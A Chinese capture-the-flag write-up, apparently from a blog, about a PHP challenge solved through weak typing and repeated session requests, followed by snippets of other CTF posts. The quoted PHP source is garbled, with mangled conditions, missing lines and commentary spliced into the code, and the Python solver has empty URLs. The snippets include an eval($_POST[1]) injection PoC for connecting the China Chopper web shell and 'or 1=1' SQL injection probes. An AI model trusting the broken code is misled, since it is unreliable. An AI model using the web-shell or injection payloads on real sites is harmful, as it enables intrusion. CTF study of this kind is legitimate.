其實不難,但是作為我這個**菜雞+腦洞菜雞+黑闊菜雞而言確實挺難。
題目原始碼:
<?php最主要的是那個19行的if語句。能夠讓她執行十次就可以得到flag了。error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_session['nums']))
if($_session['time']+120=10)
show_source(__file__);
?>
首先先看一下if後面的那個**:
其實他壓根就是為真因為我們傳如value是以陣列的形式傳入所以是不能用md5加密的。否則就是錯誤。這就是一道弱型別。所以這個不用管,因為他本身就為真。
主要是前面的
$_session['whoami']==($value[0].$value[1])第一次傳入ea然後就可以等於第8行,但是到了21行$str_rands這個變數又將$_session['whoami']的值給覆蓋了,而$str_rands的值是通過
$str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];隨機生成的。所以要進行一直瀏覽這個介面就可以得到flag就行了。
#!usr/bin/env python
#!coding=utf-8
__author__ = 'zhengjim'import requests
aa = requests.session()
code = aa.get('').text
#print code
cc = code[:2]
for i in xrange(10):url = ''.format(cc[0],cc[1])
flag= aa.get(url=url).text
cc = flag[:2]
print flag
CTF之檔案包含的猥瑣思路
一 flag.php 包含flag.php這個檔案 a request hello a這個變數請求變數hello的值 if preg match w a eval var dump a 如果匹配輸出 a的值 show source file php乙個比較有意思的變數 globals 乙個包含了全部...
「百度杯」CTF比賽 九月場 Test
個人收穫 1.連線shell 失敗的時候可以試試多個版本的菜刀,可能是菜刀的問題 2.學會了菜刀資料庫管理的配置 題目介面 有現成的poc search.php?searchtype 5 tid area eval post 1 菜刀鏈結,密碼為1我們用菜刀進行訪問 之前我用另乙個菜刀無法連線,開始...
「百度杯」CTF比賽 十月場 登入
這題的sql注入也確實是讓自己漲姿勢了。自己可以說學了mysql就沒有用過like,一直以為它在sql注入裡沒用,沒想到居然可以這樣。進入環境,是乙個登入頁面。嘗試進行sql注入,發現username為admin or 1 1 的時候顯示密碼錯誤,username為admin or 1 2 的時候顯...